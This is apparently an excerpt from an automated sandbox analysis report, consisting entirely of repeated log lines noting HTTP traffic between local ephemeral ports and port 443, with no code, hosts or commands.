        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
